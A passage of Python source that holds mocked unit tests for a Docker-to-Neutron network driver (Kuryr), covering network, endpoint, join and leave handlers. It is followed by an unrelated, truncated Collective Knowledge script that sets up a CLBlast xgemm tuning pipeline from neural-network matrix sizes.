name=fake_cidr_v4, cidr=fake_cidr_v4)
fake_subnet_response = {
'subnets': [
fake_v4_subnet['subnet']
]
}
app.neutron.create_subnet(
fake_subnet_request).AndReturn(fake_subnet_response)
self.mox.ReplayAll()
network_request = {
'NetworkID': docker_network_id,
'IPv4Data': [{
'AddressSpace': 'foo',
'Pool': '192.168.42.0/24',
'Gateway': '192.168.42.1/24',
}],
'IPv6Data': [{
'AddressSpace': 'bar',
'Pool': 'fe80::/64',
'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
}],
'Options': {}
}
response = self.app.post('/NetworkDriver.CreateNetwork',
content_type='application/json',
data=jsonutils.dumps(network_request))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
def test_network_driver_create_network_with_net_name_option(self):
docker_network_id = lib_utils.get_hash()
fake_neutron_net_id = "4e8e5957-649f-477b-9e5b-f1f75b21c03c"
self.mox.StubOutWithMock(app.neutron, "list_networks")
fake_neutron_net_name = 'my_network_name'
fake_existing_networks_response = {
"networks": [{
"status": "ACTIVE",
"subnets": [],
"admin_state_up": True,
"tenant_id": "9bacb3c5d39d41a79512987f338cf177",
"router:external": False,
"segments": [],
"shared": False,
"id": fake_neutron_net_id,
"name": "my_network_name"
}]
}
app.neutron.list_networks(
name=fake_neutron_net_name).AndReturn(
fake_existing_networks_response)
self.mox.StubOutWithMock(app.neutron, "add_tag")
tags = utils.create_net_tags(docker_network_id)
for tag in tags:
app.neutron.add_tag('networks', fake_neutron_net_id, tag)
app.neutron.add_tag(
'networks', fake_neutron_net_id, 'kuryr.net.existing')
self.mox.StubOutWithMock(app.neutron, 'list_subnets')
fake_existing_subnets_response = {
"subnets": []
}
fake_cidr_v4 = '192.168.42.0/24'
app.neutron.list_subnets(
network_id=fake_neutron_net_id,
cidr=fake_cidr_v4).AndReturn(fake_existing_subnets_response)
self.mox.StubOutWithMock(app.neutron, 'create_subnet')
fake_subnet_request = {
"subnets": [{
'name': fake_cidr_v4,
'network_id': fake_neutron_net_id,
'ip_version': 4,
'cidr': fake_cidr_v4,
'enable_dhcp': app.enable_dhcp,
'gateway_ip': '192.168.42.1',
}]
}
subnet_v4_id = str(uuid.uuid4())
fake_v4_subnet = self._get_fake_v4_subnet(
fake_neutron_net_id, subnet_v4_id,
name=fake_cidr_v4, cidr=fake_cidr_v4)
fake_subnet_response = {
'subnets': [
fake_v4_subnet['subnet']
]
}
app.neutron.create_subnet(
fake_subnet_request).AndReturn(fake_subnet_response)
self.mox.ReplayAll()
network_request = {
'NetworkID': docker_network_id,
'IPv4Data': [{
'AddressSpace': 'foo',
'Pool': '192.168.42.0/24',
'Gateway': '192.168.42.1/24',
}],
'IPv6Data': [{
'AddressSpace': 'bar',
'Pool': 'fe80::/64',
'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
}],
'Options': {
'com.docker.network.enable_ipv6': False,
'com.docker.network.generic': {
'neutron.net.name': 'my_network_name'
}
}
}
response = self.app.post('/NetworkDriver.CreateNetwork',
content_type='application/json',
data=jsonutils.dumps(network_request))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
def test_network_driver_create_network_with_netid_option(self):
docker_network_id = lib_utils.get_hash()
fake_neutron_net_id = "4e8e5957-649f-477b-9e5b-f1f75b21c03c"
self.mox.StubOutWithMock(app.neutron, "list_networks")
fake_existing_networks_response = {
"networks": [{
"status": "ACTIVE",
"subnets": [],
"admin_state_up": True,
"tenant_id": "9bacb3c5d39d41a79512987f338cf177",
"router:external": False,
"segments": [],
"shared": False,
"id": fake_neutron_net_id,
}]
}
app.neutron.list_networks(
id=fake_neutron_net_id).AndReturn(
fake_existing_networks_response)
self.mox.StubOutWithMock(app.neutron, "add_tag")
tags = utils.create_net_tags(docker_network_id)
for tag in tags:
app.neutron.add_tag('networks', fake_neutron_net_id, tag)
app.neutron.add_tag(
'networks', fake_neutron_net_id, 'kuryr.net.existing')
self.mox.StubOutWithMock(app.neutron, 'list_subnets')
fake_existing_subnets_response = {
"subnets": []
}
fake_cidr_v4 = '192.168.42.0/24'
app.neutron.list_subnets(
network_id=fake_neutron_net_id,
cidr=fake_cidr_v4).AndReturn(fake_existing_subnets_response)
self.mox.StubOutWithMock(app.neutron, 'create_subnet')
fake_subnet_request = {
"subnets": [{
'name': fake_cidr_v4,
'network_id': fake_neutron_net_id,
'ip_version': 4,
'cidr': fake_cidr_v4,
'enable_dhcp': app.enable_dhcp,
'gateway_ip': '192.168.42.1',
}]
}
subnet_v4_id = str(uuid.uuid4())
fake_v4_subnet = self._get_fake_v4_subnet(
fake_neutron_net_id, subnet_v4_id,
name=fake_cidr_v4, cidr=fake_cidr_v4)
fake_subnet_response = {
'subnets': [
fake_v4_subnet['subnet']
]
}
app.neutron.create_subnet(
fake_subnet_request).AndReturn(fake_subnet_response)
self.mox.ReplayAll()
network_request = {
'NetworkID': docker_network_id,
'IPv4Data': [{
'AddressSpace': 'foo',
'Pool': '192.168.42.0/24',
'Gateway': '192.168.42.1/24',
}],
'IPv6Data': [{
'AddressSpace': 'bar',
'Pool': 'fe80::/64',
'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
}],
'Options': {
'com.docker.network.enable_ipv6': False,
'com.docker.network.generic': {
'neutron.net.uuid': '4e8e5957-649f-477b-9e5b-f1f75b21c03c'
}
}
}
response = self.app.post('/NetworkDriver.CreateNetwork',
content_type='application/json',
data=jsonutils.dumps(network_request))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
def test_network_driver_create_network_with_pool_name_option(self):
self.mox.StubOutWithMock(app.neutron, 'list_subnetpools')
fake_kuryr_subnetpool_id = str(uuid.uuid4())
fake_name = "fake_pool_name"
kuryr_subnetpools = self._get_fake_v4_subnetpools(
fake_kuryr_subnetpool_id, name=fake_name)
app.neutron.list_subnetpools(name=fake_name).AndReturn(
{'subnetpools': kuryr_subnetpools['subnetpools']})
docker_network_id = lib_utils.get_hash()
self.mox.StubOutWithMock(app.neutron, "create_network")
fake_request = {
"network": {
"name": utils.make_net_name(docker_network_id),
"admin_state_up": True
}
}
# The following fake response is retrieved from the Neutron doc:
# http://developer.openstack.org/api-ref-networking-v2.html#createNetwork # noqa
fake_neutron_net_id = "4e8e5957-649f-477b-9e5b-f1f75b21c03c"
fake_response = {
"network": {
"status": "ACTIVE",
"subnets": [],
"name": utils.make_net_name(docker_network_id),
"admin_state_up": True,
"tenant_id": "9bacb3c5d39d41a79512987f338cf177",
"router:external": False,
"segments": [],
"shared": False,
"id": fake_neutron_net_id
}
}
app.neutron.create_network(fake_request).AndReturn(fake_response)
self.mox.StubOutWithMock(app.neutron, "add_tag")
tags = utils.create_net_tags(docker_network_id)
for tag in tags:
app.neutron.add_tag('networks', fake_neutron_net_id, tag)
self.mox.StubOutWithMock(app.neutron, 'list_subnets')
fake_existing_subnets_response = {
"subnets": []
}
fake_cidr_v4 = '192.168.42.0/24'
app.neutron.list_subnets(
network_id=fake_neutron_net_id,
cidr=fake_cidr_v4).AndReturn(fake_existing_subnets_response)
self.mox.StubOutWithMock(app.neutron, 'create_subnet')
fake_subnet_request = {
"subnets": [{
'name': fake_cidr_v4,
'network_id': fake_neutron_net_id,
'ip_version': 4,
'cidr': fake_cidr_v4,
'enable_dhcp': app.enable_dhcp,
'gateway_ip': '192.168.42.1',
'subnetpool_id': fake_kuryr_subnetpool_id,
}]
}
subnet_v4_id = str(uuid.uuid4())
fake_v4_subnet = self._get_fake_v4_subnet(
fake_neutron_net_id, subnet_v4_id,
name=fake_cidr_v4, cidr=fake_cidr_v4)
fake_subnet_response = {
'subnets': [
fake_v4_subnet['subnet']
]
}
app.neutron.create_subnet(
fake_subnet_request).AndReturn(fake_subnet_response)
self.mox.ReplayAll()
network_request = {
'NetworkID': docker_network_id,
'IPv4Data': [{
'AddressSpace': 'foo',
'Pool': '192.168.42.0/24',
'Gateway': '192.168.42.1/24',
}],
'IPv6Data': [{
'AddressSpace': 'bar',
'Pool': 'fe80::/64',
'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
}],
'Options': {
'com.docker.network.enable_ipv6': False,
'com.docker.network.generic': {
'neutron.pool.name': 'fake_pool_name'
}
}
}
response = self.app.post('/NetworkDriver.CreateNetwork',
content_type='application/json',
data=jsonutils.dumps(network_request))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
def test_network_driver_create_network_wo_gw(self):
docker_network_id = lib_utils.get_hash()
self.mox.StubOutWithMock(app.neutron, "create_network")
fake_request = {
"network": {
"name": utils.make_net_name(docker_network_id),
"admin_state_up": True
}
}
# The following fake response is retrieved from the Neutron doc:
# http://developer.openstack.org/api-ref-networking-v2.html#createNetwork # noqa
fake_neutron_net_id = "4e8e5957-649f-477b-9e5b-f1f75b21c03c"
fake_response = {
"network": {
"status": "ACTIVE",
"subnets": [],
"name": utils.make_net_name(docker_network_id),
"admin_state_up": True,
"tenant_id": "9bacb3c5d39d41a79512987f338cf177",
"router:external": False,
"segments": [],
"shared": False,
"id": fake_neutron_net_id
}
}
app.neutron.create_network(fake_request).AndReturn(fake_response)
self.mox.StubOutWithMock(app.neutron, "add_tag")
tags = utils.create_net_tags(docker_network_id)
for tag in tags:
app.neutron.add_tag('networks', fake_neutron_net_id, tag)
self.mox.StubOutWithMock(app.neutron, 'list_subnets')
fake_existing_subnets_response = {
"subnets": []
}
fake_cidr_v4 = '192.168.42.0/24'
app.neutron.list_subnets(
network_id=fake_neutron_net_id,
cidr=fake_cidr_v4).AndReturn(fake_existing_subnets_response)
self.mox.StubOutWithMock(app.neutron, 'create_subnet')
fake_subnet_request = {
"subnets": [{
'name': fake_cidr_v4,
'network_id': fake_neutron_net_id,
'ip_version': 4,
'cidr': fake_cidr_v4,
'enable_dhcp': app.enable_dhcp,
}]
}
subnet_v4_id = str(uuid.uuid4())
fake_v4_subnet = self._get_fake_v4_subnet(
fake_neutron_net_id, subnet_v4_id,
name=fake_cidr_v4, cidr=fake_cidr_v4)
fake_subnet_response = {
'subnets': [
fake_v4_subnet['subnet']
]
}
app.neutron.create_subnet(
fake_subnet_request).AndReturn(fake_subnet_response)
self.mox.ReplayAll()
network_request = {
'NetworkID': docker_network_id,
'IPv4Data': [{
'AddressSpace': 'foo',
'Pool': '192.168.42.0/24',
}],
'IPv6Data': [{
'AddressSpace': 'bar',
'Pool': 'fe80::/64',
'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
}],
'Options': {}
}
response = self.app.post('/NetworkDriver.CreateNetwork',
content_type='application/json',
data=jsonutils.dumps(network_request))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
def test_network_driver_create_network_with_network_id_not_exist(self):
docker_network_id = lib_utils.get_hash()
self.mox.StubOutWithMock(app.neutron, "list_networks")
fake_neutron_net_id = str(uuid.uuid4())
fake_existing_networks_response = {
"networks": []
}
app.neutron.list_networks(
id=fake_neutron_net_id).AndReturn(
fake_existing_networks_response)
self.mox.ReplayAll()
network_request = {
'NetworkID': docker_network_id,
'IPv4Data': [{
'AddressSpace': 'foo',
'Pool': '192.168.42.0/24',
}],
'IPv6Data': [{
'AddressSpace': 'bar',
'Pool': 'fe80::/64',
'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
}],
'Options': {
constants.NETWORK_GENERIC_OPTIONS: {
constants.NEUTRON_UUID_OPTION: fake_neutron_net_id
}
}
}
response = self.app.post('/NetworkDriver.CreateNetwork',
content_type='application/json',
data=jsonutils.dumps(network_request))
self.assertEqual(500, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertIn('Err', decoded_json)
err_message = ("Specified network id/name({0}) does not "
"exist.").format(fake_neutron_net_id)
self.assertEqual({'Err': err_message}, decoded_json)
def test_network_driver_create_network_with_network_name_not_exist(self):
docker_network_id = lib_utils.get_hash()
self.mox.StubOutWithMock(app.neutron, "list_networks")
fake_neutron_network_name = "fake_network"
fake_existing_networks_response = {
"networks": []
}
app.neutron.list_networks(
name=fake_neutron_network_name).AndReturn(
fake_existing_networks_response)
self.mox.ReplayAll()
network_request = {
'NetworkID': docker_network_id,
'IPv4Data': [{
'AddressSpace': 'foo',
'Pool': '192.168.42.0/24',
}],
'IPv6Data': [{
'AddressSpace': 'bar',
'Pool': 'fe80::/64',
'Gateway': 'fe80::f816:3eff:fe20:57c3/64',
}],
'Options': {
constants.NETWORK_GENERIC_OPTIONS: {
constants.NEUTRON_NAME_OPTION: fake_neutron_network_name
}
}
}
response = self.app.post('/NetworkDriver.CreateNetwork',
content_type='application/json',
data=jsonutils.dumps(network_request))
self.assertEqual(500, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertIn('Err', decoded_json)
err_message = ("Specified network id/name({0}) does not "
"exist.").format(fake_neutron_network_name)
self.assertEqual({'Err': err_message}, decoded_json)
def test_network_driver_delete_network(self):
docker_network_id = lib_utils.get_hash()
fake_neutron_net_id = str(uuid.uuid4())
self._mock_out_network(fake_neutron_net_id, docker_network_id,
check_existing=True)
self.mox.StubOutWithMock(app.neutron, 'list_subnets')
fake_neutron_subnets_response = {"subnets": []}
app.neutron.list_subnets(network_id=fake_neutron_net_id).AndReturn(
fake_neutron_subnets_response)
self.mox.StubOutWithMock(app.neutron, 'delete_network')
app.neutron.delete_network(fake_neutron_net_id).AndReturn(None)
self.mox.ReplayAll()
data = {'NetworkID': docker_network_id}
response = self.app.post('/NetworkDriver.DeleteNetwork',
content_type='application/json',
data=jsonutils.dumps(data))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
def test_network_driver_delete_network_with_subnets(self):
docker_network_id = lib_utils.get_hash()
docker_endpoint_id = lib_utils.get_hash()
fake_neutron_net_id = str(uuid.uuid4())
self._mock_out_network(fake_neutron_net_id, docker_network_id,
check_existing=True)
# The following fake response is retrieved from the Neutron doc:
# http://developer.openstack.org/api-ref-networking-v2.html#createSubnet # noqa
subnet_v4_id = "9436e561-47bf-436a-b1f1-fe23a926e031"
subnet_v6_id = "64dd4a98-3d7a-4bfd-acf4-91137a8d2f51"
fake_v4_subnet = self._get_fake_v4_subnet(
docker_network_id, docker_endpoint_id, subnet_v4_id)
fake_v6_subnet = self._get_fake_v6_subnet(
docker_network_id, docker_endpoint_id, subnet_v6_id)
fake_subnets_response = {
"subnets": [
fake_v4_subnet['subnet'],
fake_v6_subnet['subnet']
]
}
self.mox.StubOutWithMock(app.neutron, 'list_subnets')
app.neutron.list_subnets(network_id=fake_neutron_net_id).AndReturn(
fake_subnets_response)
self.mox.StubOutWithMock(app.neutron, 'list_subnetpools')
fake_subnetpools_response = {"subnetpools": []}
app.neutron.list_subnetpools(name='kuryr').AndReturn(
fake_subnetpools_response)
app.neutron.list_subnetpools(name='kuryr6').AndReturn(
fake_subnetpools_response)
self.mox.StubOutWithMock(app.neutron, 'delete_subnet')
app.neutron.delete_subnet(subnet_v4_id).AndReturn(None)
app.neutron.delete_subnet(subnet_v6_id).AndReturn(None)
self.mox.StubOutWithMock(app.neutron, 'delete_network')
app.neutron.delete_network(fake_neutron_net_id).AndReturn(None)
self.mox.ReplayAll()
data = {'NetworkID': docker_network_id}
response = self.app.post('/NetworkDriver.DeleteNetwork',
content_type='application/json',
data=jsonutils.dumps(data))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
def test_network_driver_create_endpoint(self):
docker_network_id = lib_utils.get_hash()
docker_endpoint_id = lib_utils.get_hash()
fake_neutron_net_id = str(uuid.uuid4())
self._mock_out_network(fake_neutron_net_id, docker_network_id)
# The following fake response is retrieved from the Neutron doc:
# http://developer.openstack.org/api-ref-networking-v2.html#createSubnet # noqa
subnet_v4_id = "9436e561-47bf-436a-b1f1-fe23a926e031"
subnet_v6_id = "64dd4a98-3d7a-4bfd-acf4-91137a8d2f51"
fake_v4_subnet = self._get_fake_v4_subnet(
docker_network_id, docker_endpoint_id, subnet_v4_id)
fake_v6_subnet = self._get_fake_v6_subnet(
docker_network_id, docker_endpoint_id, subnet_v6_id)
fake_subnetv4_response = {
"subnets": [
fake_v4_subnet['subnet']
]
}
fake_subnetv6_response = {
"subnets": [
fake_v6_subnet['subnet']
]
}
self.mox.StubOutWithMock(app.neutron, 'list_subnets')
app.neutron.list_subnets(network_id=fake_neutron_net_id,
cidr='192.168.1.0/24').AndReturn(fake_subnetv4_response)
app.neutron.list_subnets(
network_id=fake_neutron_net_id,
cidr='fe80::/64').AndReturn(fake_subnetv6_response)
fake_ipv4cidr = '192.168.1.2/24'
fake_ipv6cidr = 'fe80::f816:3eff:fe20:57c4/64'
fake_port_id = str(uuid.uuid4())
fake_port = self._get_fake_port(
docker_endpoint_id, fake_neutron_net_id,
fake_port_id, lib_const.PORT_STATUS_ACTIVE,
subnet_v4_id, subnet_v6_id)
fake_fixed_ips = ['subnet_id=%s' % subnet_v4_id,
'ip_address=192.168.1.2',
'subnet_id=%s' % subnet_v6_id,
'ip_address=fe80::f816:3eff:fe20:57c4']
fake_port_response = {
"ports": [
fake_port['port']
]
}
self.mox.StubOutWithMock(app.neutron, 'list_ports')
app.neutron.list_ports(fixed_ips=fake_fixed_ips).AndReturn(
fake_port_response)
fake_updated_port = fake_port['port']
fake_updated_port['name'] = '-'.join([docker_endpoint_id, 'port'])
self.mox.StubOutWithMock(app.neutron, 'update_port')
app.neutron.update_port(fake_updated_port['id'], {'port': {
'name': fake_updated_port['name'],
'device_owner': lib_const.DEVICE_OWNER,
'device_id': docker_endpoint_id}}).AndReturn(fake_port)
self.mox.ReplayAll()
data = {
'NetworkID': docker_network_id,
'EndpointID': docker_endpoint_id,
'Options': {},
'Interface': {
'Address': fake_ipv4cidr,
'AddressIPv6': fake_ipv6cidr,
'MacAddress': "fa:16:3e:20:57:c3"
}
}
response = self.app.post('/NetworkDriver.CreateEndpoint',
content_type='application/json',
data=jsonutils.dumps(data))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
expected = {'Interface': {}}
self.assertEqual(expected, decoded_json)
def test_network_driver_endpoint_operational_info_with_no_port(self):
docker_network_id = lib_utils.get_hash()
docker_endpoint_id = lib_utils.get_hash()
fake_port_response = {"ports": []}
with mock.patch.object(app.neutron, 'list_ports') as mock_list_ports:
data = {
'NetworkID': docker_network_id,
'EndpointID': docker_endpoint_id,
}
mock_list_ports.return_value = fake_port_response
response = self.app.post('/NetworkDriver.EndpointOperInfo',
content_type='application/json',
data=jsonutils.dumps(data))
decoded_json = jsonutils.loads(response.data)
self.assertEqual(200, response.status_code)
port_name = utils.get_neutron_port_name(docker_endpoint_id)
mock_list_ports.assert_called_once_with(name=port_name)
self.assertEqual({}, decoded_json['Value'])
def test_network_driver_endpoint_operational_info(self):
docker_network_id = lib_utils.get_hash()
docker_endpoint_id = lib_utils.get_hash()
fake_neutron_net_id = str(uuid.uuid4())
fake_port_id = str(uuid.uuid4())
fake_port = self._get_fake_port(
docker_endpoint_id, fake_neutron_net_id,
fake_port_id, lib_const.PORT_STATUS_ACTIVE)
fake_port_response = {
"ports": [
fake_port['port']
]
}
with mock.patch.object(app.neutron, 'list_ports') as mock_list_ports:
data = {
'NetworkID': docker_network_id,
'EndpointID': docker_endpoint_id,
}
mock_list_ports.return_value = fake_port_response
response = self.app.post('/NetworkDriver.EndpointOperInfo',
content_type='application/json',
data=jsonutils.dumps(data))
decoded_json = jsonutils.loads(response.data)
self.assertEqual(200, response.status_code)
port_name = utils.get_neutron_port_name(docker_endpoint_id)
mock_list_ports.assert_called_once_with(name=port_name)
self.assertEqual(fake_port_response['ports'][0]['status'],
decoded_json['Value']['status'])
def test_network_driver_delete_endpoint(self):
docker_network_id = lib_utils.get_hash()
docker_endpoint_id = lib_utils.get_hash()
data = {
'NetworkID': docker_network_id,
'EndpointID': docker_endpoint_id,
}
response = self.app.post('/NetworkDriver.DeleteEndpoint',
content_type='application/json',
data=jsonutils.dumps(data))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
@ddt.data(
(False), (True))
def test_network_driver_join(self, vif_plug_is_fatal):
if vif_plug_is_fatal:
self.mox.StubOutWithMock(app, "vif_plug_is_fatal")
app.vif_plug_is_fatal = True
fake_docker_net_id = lib_utils.get_hash()
fake_docker_endpoint_id = lib_utils.get_hash()
fake_container_id = lib_utils.get_hash()
fake_neutron_net_id = str(uuid.uuid4())
fake_neutron_network = self._mock_out_network(
fake_neutron_net_id, fake_docker_net_id)
fake_neutron_port_id = str(uuid.uuid4())
self.mox.StubOutWithMock(app.neutron, 'list_ports')
neutron_port_name = utils.get_neutron_port_name(
fake_docker_endpoint_id)
fake_neutron_v4_subnet_id = str(uuid.uuid4())
fake_neutron_v6_subnet_id = str(uuid.uuid4())
fake_neutron_ports_response = self._get_fake_ports(
fake_docker_endpoint_id, fake_neutron_net_id,
fake_neutron_port_id, lib_const.PORT_STATUS_DOWN,
fake_neutron_v4_subnet_id, fake_neutron_v6_subnet_id)
app.neutron.list_ports(name=neutron_port_name).AndReturn(
fake_neutron_ports_response)
self.mox.StubOutWithMock(app.neutron, 'list_subnets')
fake_neutron_subnets_response = self._get_fake_subnets(
fake_docker_endpoint_id, fake_neutron_net_id,
fake_neutron_v4_subnet_id, fake_neutron_v6_subnet_id)
app.neutron.list_subnets(network_id=fake_neutron_net_id).AndReturn(
fake_neutron_subnets_response)
fake_neutron_port = fake_neutron_ports_response['ports'][0]
fake_neutron_subnets = fake_neutron_subnets_response['subnets']
_, fake_peer_name, _ = self._mock_out_binding(
fake_docker_endpoint_id, fake_neutron_port,
fake_neutron_subnets, fake_neutron_network['networks'][0])
if vif_plug_is_fatal:
self.mox.StubOutWithMock(app.neutron, 'show_port')
fake_neutron_ports_response_2 = self._get_fake_port(
fake_docker_endpoint_id, fake_neutron_net_id,
fake_neutron_port_id, lib_const.PORT_STATUS_ACTIVE,
fake_neutron_v4_subnet_id, fake_neutron_v6_subnet_id)
app.neutron.show_port(fake_neutron_port_id).AndReturn(
fake_neutron_ports_response_2)
self.mox.ReplayAll()
fake_subnets_dict_by_id = {subnet['id']: subnet
for subnet in fake_neutron_subnets}
join_request = {
'NetworkID': fake_docker_net_id,
'EndpointID': fake_docker_endpoint_id,
'SandboxKey': utils.get_sandbox_key(fake_container_id),
'Options': {},
}
response = self.app.post('/NetworkDriver.Join',
content_type='application/json',
data=jsonutils.dumps(join_request))
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
fake_neutron_v4_subnet = fake_subnets_dict_by_id[
fake_neutron_v4_subnet_id]
fake_neutron_v6_subnet = fake_subnets_dict_by_id[
fake_neutron_v6_subnet_id]
expected_response = {
'Gateway': fake_neutron_v4_subnet['gateway_ip'],
'GatewayIPv6': fake_neutron_v6_subnet['gateway_ip'],
'InterfaceName': {
'DstPrefix': config.CONF.binding.veth_dst_prefix,
'SrcName': fake_peer_name,
},
'StaticRoutes': []
}
self.assertEqual(expected_response, decoded_json)
def test_network_driver_leave(self):
fake_docker_net_id = lib_utils.get_hash()
fake_docker_endpoint_id = lib_utils.get_hash()
fake_neutron_net_id = str(uuid.uuid4())
self._mock_out_network(fake_neutron_net_id, fake_docker_net_id)
fake_neutron_port_id = str(uuid.uuid4())
self.mox.StubOutWithMock(app.neutron, 'list_ports')
neutron_port_name = utils.get_neutron_port_name(
fake_docker_endpoint_id)
fake_neutron_v4_subnet_id = str(uuid.uuid4())
fake_neutron_v6_subnet_id = str(uuid.uuid4())
fake_neutron_ports_response = self._get_fake_ports(
fake_docker_endpoint_id, fake_neutron_net_id,
fake_neutron_port_id, lib_const.PORT_STATUS_ACTIVE,
fake_neutron_v4_subnet_id, fake_neutron_v6_subnet_id)
app.neutron.list_ports(name=neutron_port_name).AndReturn(
fake_neutron_ports_response)
fake_neutron_port = fake_neutron_ports_response['ports'][0]
self._mock_out_unbinding(fake_docker_endpoint_id, fake_neutron_port)
leave_request = {
'NetworkID': fake_docker_net_id,
'EndpointID': fake_docker_endpoint_id,
}
response = self.app.post('/NetworkDriver.Leave',
content_type='application/json',
data=jsonutils.dumps(leave_request))
self.mox.ReplayAll()
self.assertEqual(200, response.status_code)
decoded_json = jsonutils.loads(response.data)
self.assertEqual(constants.SCHEMA['SUCCESS'], decoded_json)
| |
#!/bin/python
import ck.kernel as ck
import copy
import re
import argparse
import os
import json
#######################################
# Description:
#
# KERNEL = xgemm client
# INPUT = SIZE (M,N,K); PRECISION
# OUTPUT = CONFIGURATION
#######################################
'''
Set interval or Resolution 25%
Set resolution 0 //powersafe mode take min
Set resolution 1// performance mode take max
Set resolution x[0 and 1]
Convert x in percent
Start from lower Freq. The next freq is the first freq with freq_min + x % of power.
Set resolution 2
Try all frequencies
Example of Set resolution x
Freq availables 100 MHz, 200MHz, 400MHz, 800Mhz, 2000Mhz
Set interval 50%.
Lvl 0: 100Mhz
Lvl 1: 150Mhz // value not allowed
Lvl 2: 200Mhz OK
Lvl 3: 250Mhz
'''
# clock_resolution
# 0 min freq
# 1 max freq [default]
# (0,1) called resolution convert. Create intervals starting from min. Interval 0 = frequencies between min and min+(min*resolution)
#otherwise takes min and mix and divide per a fixed number
# 2 run all the frequencies
clock_resolution = 1.0
kernel = [ 'default' ]
title = 'CLBlast client'
# Matrix sizes: C[mxn] = A[mxk] * B[kxn].
#size_m = [ '512', '256', '128', '1024' ]
#size_n = [ '256', '512', '128', '1024' ]
#size_k = [ '128', '256', '1024', ' 128' ]
alex_net_json = 'models/BatchSize1/AlexNet.json'
google_net_json = 'models/BatchSize1/GoogleNet.json'
squeeze11_net_json = 'models/BatchSize1/Squeeze1.1.json'
precision = 32 # default
run = 10 # default
VERBOSE = 0
VERBOSE_STR = '[VERBOSE] '
DEBUG = 0
DEBUG_STR = '[DEBUG] '
def loadMatrixFromJson(fin):
f = open(fin)
j = json.load(f)
m = []
n = []
k = []
for e in j:
m.append(e['m'])
n.append(e['n'])
k.append(e['k'])
M = { 'M' : m, 'N' : n, 'K' : k}
return M
def do(i, arg):
if arg.fp is not None:
fin = arg.fp
if (os.path.isfile(fin)):
print ("File loading %s " %(fin))
#LOAD FILE and TRIPLES
else:
print("File %s not found " %(fin))
#Load Models Matrixes
alex_net = loadMatrixFromJson(alex_net_json)
google_net = loadMatrixFromJson(google_net_json)
squeeze11_net = loadMatrixFromJson(squeeze11_net_json)
dataset =[]
dataset.append({'Model_name': 'AlexNet', 'Batch_size' : 1, 'matrix' : alex_net})
dataset.append({'Model_name': 'GoogleNet', 'Batch_size' : 1, 'matrix' : google_net})
dataset.append({'Model_name': 'SqueezeNet1.1', 'Batch_size' : 1, 'matrix' : squeeze11_net})
if VERBOSE or DEBUG:
print('[Experiment] %s' % title)
print('[Preparing pipeline] Clock resolution: %d' % clock_resolution)
#print('[Preparing pipeline] Matrix sizes: m=%s, k=%s, n=%s: ' % (size_m, size_k, size_n))
print('[Preparing pipeline] Precision: %d' % precision)
print('[Preparing pipeline] Run for configuration: %d' % run)
print('[Preparing pipeline] More parms... ')
#ntrip = len(size_m)
#print ('[Experiment] Number of triple(s) %s' % (ntrip))
#size_tag = ''
#for tp in range (0, ntrip):
# if (tp == ntrip-1):
# size_tag += str((int(size_m[tp])*int(size_n[tp])*int(size_k[tp])))
# else:
# size_tag += str((int(size_m[tp])*int(size_n[tp])*int(size_k[tp])))+','
# Detect basic platform info.
ii={'action':'detect',
'module_uoa':'platform',
'con':'con'}
r=ck.access(ii)
if DEBUG: print("%s %s" %(DEBUG_STR, r))
if r['return']>0: return r
# Host and target OS params.
hos=r['host_os_uoa']
hosd=r['host_os_dict']
tos=r['os_uoa']
tosd=r['os_dict']
tdid=r['device_id']
if DEBUG: print("%s %s %s" %(DEBUG_STR, hos, hosd))
if DEBUG: print("%s %s %s %s" %( DEBUG_STR, tos, tosd, tdid))
# Load CLBLAST program meta and desc to check deps.
ii={'action':'load',
'module_uoa':'program',
'data_uoa':'clblast-tune'}
rx=ck.access(ii)
if DEBUG: print("%s %s " %(DEBUG_STR, rx))
if rx['return']>0: return rx
meta= rx['dict']
# Get compile-time and run-time deps.
cdeps=meta.get('compile_deps',{})
rdeps=meta.get('run_deps',{})
# Merge rdeps with cdeps for setting up the pipeline (which uses
# common deps), but tag them as "for_run_time".
for k in rdeps:
cdeps[k]=rdeps[k]
cdeps[k]['for_run_time']='yes'
# CLblast libs.
depl=copy.deepcopy(cdeps['lib-clblast'])
#ON LOCAL MACHINE
if ((arg.tos is not None) and (arg.did is not None) ):
tos=arg.tos
tdid=arg.did
ii={'action':'resolve',
'module_uoa':'env',
'host_os':hos,
'target_os':tos,
'device_id':tdid,
'out':'con',
'deps':{'lib-clblast':copy.deepcopy(depl)}
}
r=ck.access(ii)
if r['return']>0: return r
udepl=r['deps']['lib-clblast'].get('choices',[])
if len(udepl)==0: return {'return':1, 'error':'no installed CLBlast libs'}
cdeps['lib-clblast']['uoa']=udepl[0]
#prepare pipeline
ii={'action':'pipeline',
'module_uoa':'program',
'data_uoa':'clblast-tune',
'prepare':'yes',
'dependencies': cdeps,
'no_compiler_description':'yes',
'cmd_key':kernel[0],
"target_os":tos,
"device_id":tdid,
"out":'con',
"no_state_check":"yes",
'flags':'-O3',
'cpu_freq' : 'max',
'gpu_freq' : 'max',
}
r=ck.access(ii)
if r['return']>0: return r
